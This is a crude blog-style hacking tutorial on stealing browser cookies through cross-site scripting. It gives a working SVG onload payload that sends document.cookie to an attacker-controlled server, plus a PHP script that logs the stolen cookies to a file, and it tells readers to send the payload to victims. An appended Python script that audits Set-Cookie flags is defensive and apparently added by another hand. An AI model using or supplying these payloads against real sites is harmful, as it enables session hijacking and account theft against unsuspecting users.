Hacking Tutorials XSS

Cookie Stealing With XSS (Optimized Payload)

How are you doing, bros? Today I am gonna show you how to steal cookies with my love, XSS. Let's go!

So basically, injecting JavaScript into websites is called XSS, and hence via XSS you can do whatever the fuck JavaScript can.

We will use these six things:

  1. JavaScript
  2. Fetch API
  3. Our Server
  4. document.cookie property
  5. A Vulnerable Website
  6. A Sex Doll (Optional)

The Fetch API is used to fetch resources such as webpages, and the document.cookie property returns the cookies that are accessible from the DOM.

Step 1. Copy the following code thingy

<svg onload=fetch("//attacker:port/"%2Bcookie)>

Step 2. Most important step

Replace //attacker:port/ with your server name and port.

Step 3. Hack ’em!

Yeah, send it to your victim and check your server logs.

What the actual fuck?

  • We are injecting an HTML element into the webpage, i.e. an SVG.
  • onload is an event handler which gets triggered when the element associated with it gets loaded.
  • fetch() is used to make a request to a webpage.
  • attacker:port is our server and port, so the browser makes a request to us.
  • %2B is the URL-encoded form of +.
  • cookie is the same as document.cookie, which returns the cookie (inside an inline event handler the document object is on the scope chain, so the bare name resolves).

Putting it together: we are injecting a payload which, when loaded, makes a request to our server that includes the cookie.

So… That's it?

No! Who the fuck has time to check server logs and shit? Let's try plan B.

Step 1. Create Recording Mechanism

Open your text editor and paste the following code:

 <?php
 // Grab the raw request path, e.g. /r.php?=<cookie string>
 $url = $_SERVER['REQUEST_URI'];
 // Strip the script path so only the cookie string remains
 $new = str_replace('/r.php?=', '', $url);
 $handle = fopen('log.txt', 'w') or die('Cannot open file: '.'log.txt');
 fwrite($handle, $new);
 fclose($handle);

and save it as r.php.

Now create a blank text file named log.txt and, after navigating to it in your terminal, enter chmod +x log.txt.

Step 2. That’s it

Host this file on your server and use the following payload:

<svg onload=fetch("//attacker/r.php?="%2Bcookie)>

Just send the payload to your victim and the cookie will be stored in log.txt.

Note: No need to include the port because you will be serving it on default HTTP port i.e. 80.

Thanks for reading. I hope you enjoyed this tutorial.
Please check other tutorials as well.

Oh yeah, one more thing… this method doesn't work when a smart-ass developer sets the HttpOnly flag on the Set-Cookie header. In that case the cookie never reaches the DOM, so JavaScript can't read it.
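As an added example (not the author's code), here is a small Python audit of Set-Cookie header values that reports which cookies are still readable through document.cookie or are otherwise weakly scoped. The sample headers are constructed, and the "sensitive cookie name" heuristic is an assumption of this example.

```python
"""Audit Set-Cookie headers for the flags that blunt document.cookie exfiltration."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample Set-Cookie values (assumption: typical session cookies).
SAMPLE_HEADERS = [
    "PHPSESSID=abc123; Path=/",
    "sid=xyz789; Path=/; HttpOnly; Secure; SameSite=Lax",
    "theme=dark; Path=/; Max-Age=31536000",
    "auth=tok; Path=/; HttpOnly; SameSite=None",
]

@dataclass
class CookieAudit:
    name: str
    httponly: bool
    secure: bool
    samesite: Optional[str]
    findings: List[str] = field(default_factory=list)

def audit_set_cookie(header: str) -> CookieAudit:
    """Parse one Set-Cookie value and list weaknesses.
    HttpOnly keeps the cookie out of document.cookie (the property the payload
    above reads); Secure and SameSite limit where the browser sends it."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for p in parts[1:]:                      # attribute names are case-insensitive
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    a = CookieAudit(name, "httponly" in attrs, "secure" in attrs,
                    attrs.get("samesite") or None)
    # Heuristic (assumption): names that look like session/auth cookies must be HttpOnly.
    sensitive = re.search(r"sess|sid|auth|token", name, re.I) is not None
    if sensitive and not a.httponly:
        a.findings.append("readable via document.cookie: add HttpOnly")
    if not a.secure:
        a.findings.append("sent over plain HTTP: add Secure")
    if a.samesite is None:
        a.findings.append("no SameSite attribute")
    elif a.samesite.lower() == "none" and not a.secure:
        a.findings.append("SameSite=None requires Secure")
    return a

def audit_all(headers: List[str]) -> Dict[str, List[str]]:
    """Map each cookie name to its list of findings (empty list means OK)."""
    return {a.name: a.findings for a in map(audit_set_cookie, headers)}

if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_HEADERS).items():
        print(name, "OK" if not findings else "; ".join(findings))
```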

About the author

I am Somdev Sangwan, also known as D3V. I am a n00b and I love computers and hacking. I am a Python freak and your friendly neighborhood hacker.
